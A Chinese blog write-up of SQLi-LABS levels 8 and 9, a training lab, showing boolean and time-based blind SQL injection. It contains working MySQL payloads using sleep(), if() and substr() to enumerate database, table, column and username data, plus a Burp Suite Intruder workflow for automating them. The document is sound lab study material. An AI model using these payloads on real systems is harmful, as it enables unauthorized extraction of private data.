【SQLi-LABS】Less-8、Less9 Blind- Boolean/Time based- Single Quotes- String解题记录

已于 2023-03-11 23:17:37 修改
阅读量269 收藏
点赞数 1
分类专栏: 靶场 解题 SQL注入 文章标签: mysql sql 数据库
于 2022-09-23 13:39:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ON_Zero/article/details/126159764
版权
解题 同时被 3 个专栏收录
8 篇文章 0 订阅
订阅专栏
靶场
7 篇文章 0 订阅
订阅专栏
SQL注入
4 篇文章 1 订阅
订阅专栏

SQLi-LABS Less-8 Blind- Boolean- Single Quotes- String

使用布尔盲注解决

这一题见题知意,布尔盲注-单引号,没有太多内容可以讲。
与前面不同的是,这一关中输入的值不正确时会不显示任何的反馈,不过输入正确时会有You are in…的反馈,可以直接使用布尔盲注。
闭合字符是单引号,判断过程可以参考我以前的帖子。
输入正确时:
在这里插入图片描述
输入错误时:
在这里插入图片描述

SQLi-LABS Less-9 Blind- Time based- Single Quotes- String

这一关中,无论我们的输入是正确还是错误,都会返回You are in…,布尔盲注用于true和false两种情况时网页分别有不同反应的时候, 而这道题中,两种情况都是一样的反应 ,这时候就需要用到延时盲注 了。
在这里插入图片描述

时间盲注

时间注入和布尔盲注没有太多的差别,既然true和false都不会有页面上的反应,那么我们手动加一些参数,让页面上有一些反应使两种情况区分开就好。
时间盲注使用了if函数和sleep()函数来实现这个想法。if(a,sleep(10),1) 如果a结果是真,那么执行sleep(10)页面延迟10秒,如果a的结果是假,执行1,页面不延迟。

1.判断闭合字符

我们可以通过时间盲注来判断闭合字符,使用时间盲注相比于直接使用布尔盲注会更加耗时。

?id=1' and sleep(1)--+

使用双引号、单引号、括号进行尝试,发现唯有id=1'时回应是1秒以上,这说明当后面是单引号时这个语句变得完整了,单引号就是这一关的闭合字符。
在这里插入图片描述

2.注入逻辑

接下来的注入和布尔盲注基本没什么区别,通过是否有延时来证明返回值为true或false。

?id=1' and if((database()='security'),sleep(1),1)-- +

在这里插入图片描述
盲注遍历字符爆数据库名

?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(1),1)-- +

在这里插入图片描述

3.使用burpsuit进行时间盲注
3.1爆数据库名长度

浏览器中,在注入点写入sql注入语句,访问网址,使用burpsuit抓包。
在这里插入图片描述

此处sql注入语句若未转码,服务器会读取不了,从而盲注失败!
作者注: 原先我想先抓包,然后在burpsuit中写sql注入语句,之后使用burpsuit的转码功能进行转码以达到同样效果,不过burpsuit内置的转码似乎与浏览器直接传过来的转码有一点区别,最后只好在浏览器把注入语句写好再进行抓包。
(左:浏览器传来可以被服务器正确读取的转码,右:burpsuit自带的转码)
在这里插入图片描述

发送到intruder,添加payload位置。
在这里插入图片描述

配置payload类型为数值,可以将to设置得大一些,毕竟不排除有的数据库名大于10的情况。
在这里插入图片描述
然后点击攻击,在弹出的弹窗中,将“列”选项卡的“接收到响应、响应完成”分别打开,用以查看响应时间。
在这里插入图片描述
将结果以“接收到响应”排列,可以看到,排在第一位的就是我们需要的盲注结果,说明了我们的目标数据库名是8位字符。
在这里插入图片描述

3.2爆数据库名

同理,爆数据库名。

?id=1' and if(substr(database(),1,1)='a',sleep(1),1)-- +

在这里插入图片描述
得出获得数据库名字符,按照payload1给的顺序排列,得出数据库名为“security”。
在这里插入图片描述

3.3爆表名
?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(3),1)-- +

在这里插入图片描述
作者的话: 可以将结果选中然后保存到结果表,使用excel打开并排序,(也许…)可以省去手动排序的时间
在这里插入图片描述

在这里插入图片描述

3.4爆字段名
?id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1)='e',sleep(3),1)--+

在这里插入图片描述

获得表users的字段名为id,username,password。
在这里插入图片描述

3.5爆字段内容
?id=1' and if(substr((select group_concat(username) from users),1,1)='e',sleep(2),1)--+

获取到username如下。
在这里插入图片描述

3.6总结

使用burpsuit可以进行时间盲注,同样地也可以进行布尔盲注,布尔盲注中重在找到正确的成功标志,时间盲注中重在使用正确的时间盲注代码

Wuyong_12
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlilabs—less8
一个普普通通的博客
03-24 794
sqlilabs—less8
sqli-labs-less-8 布尔盲注+延时注入(详解)
yzcn
10-30 811
Less-8 延时注入+布尔盲注 判断注入点: http://127.0.0.1/sqli-labs-master/Less-8/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ 无任何回显 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ --+ 显示正常,找到注入点,该题特点为正确时返回you are in,错误时无任何回显,可以考虑用之前的布尔盲注或者延时注入进行解题 方法一(布尔盲
学习记录sqli-labs less8
x_13579的博客
02-16 120
特点:页面存在异常,页面无回显也无报错信息,这是布尔型盲注的特点。这个也是试对的时候才会出现正确的页面,结合ascii码表。用等号的方式去测的话需要一个一个的去试,可以选择用大于号或者是小于号,采用二分法的形式去测,这样比一个一个要快一些。这时,并不会和以前一样有什么显示,还是显示正常的页面,没有得到我们想要的显示位。上面我们知道了数据库名的长度为8,所以要测第一个字符,第二个...第八个。
sql-labs-less8 基于盲注的boolan注入全过程
Mysmycbx的博客
07-04 227
sql-labs-less8 GET - Blind - Boolan Based - Single Quotes step0 准备 http://192.168.139.138/sqli-labs/Less-8/ HackBar MySQL Apache step1 测试 首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”; payload: http://192.168.139.138/sqli-la
sqli-labs/Less-8
m0_71299382的博客
11-09 227
sqli-labs第八关
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
从零记录sqli-labs学习过程sqli-labs Less-8
fpxnb1的博客
04-12 3600
使用脚本进行盲注,主要在于记录脚本的使用学习
sqli-labs靶场Less-8
songling515010475的专栏
08-23 220
1、访问首页,/Less-8/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 分析:这里是单引号闭合,且这里输错SQL语句没有报错和提示,只是不展示数据而己。哪么这里能用到的方式与第7关一样, 2、判断字段数量 http://192.168.60.142:8080/sqlilabs/Less-8/index.php?id=1 ' order b..
sqlilabs Less-8 盲注浅学习
m0_63253040的博客
03-23 1147
布尔盲注学习 学习博客 页面只会返回True和False两种结果 以这关为例,当结果为True时返回You are in...,结果为False时无回显结果 布尔盲注需要用到的主要函数 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 第一步
SQL注入原理及如何判断闭合符
m0_56235433的博客
12-10 1313
SQL注入原理及如何判断闭合符
sql注入-联合注入
tlucky的博客
04-10 721
1.第一关 (1)根据提示输入id (2)求闭合字符 使用单引号出现报错,说明闭合字符为单引号 (3)求字段数 为3时显示正常 ,字段数为3 (4)求回显字段 回显字段为2,3 (5)爆数据库名 (6)爆表名 (5)爆列名 (8)爆字段名 2. 第二关 (1)求闭合字符 可判断为数值型注入 (2)确定字段数 字段数为3 (3)确定回显数 回显位为2,3 (4)爆数据库名 (5)爆表名 (6)爆列名 (7)爆字段名 3. 第三关 (1)求注入类型 加)试一下,
求闭合字符
WYJ____的博客
07-24 1229
    数字型 select id, username,password from users where id = $id limit 0,1; id输入:3%23 select id, username,password from users where id = 3%23 limit 0,1; 试探方法: id输入:1' select id, username,password fro...
算法-判断字符串闭合
sparrow的博客
09-16 644
(),{},[] 三种类型符号组成未知长度字符串,判断该字符串是否是闭合字符串 是闭合则返回true 否则返回false 例如: (){}[] // true ([) // false ({[]}) // true function judge(str){ var length=str.length; var right=[']','}',')']; var strArr=[]; for(var i=0;i<length;i++){ var cur=s
判断字符串括号是否闭合(){}[]
weixin_34258782的博客
05-10 1015
今天去面试做了一道狠可爱的题目,判断一个字符串的括号自否闭合(包括大小中括号) 当时没马上做出来,只是说了大概的思路 一开始的思路就是判断每种括号的开闭数量是否相等,其实虽然也能实现但是搞得太复杂了; 回来后查了下发现很多都是利用堆栈实现的, 下面是不用栈实现的方式: 只需设一个常量, 开+1, 闭-1, 闭合的话为0, 没闭合的话不为0, 出现<0即为顺序不对 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值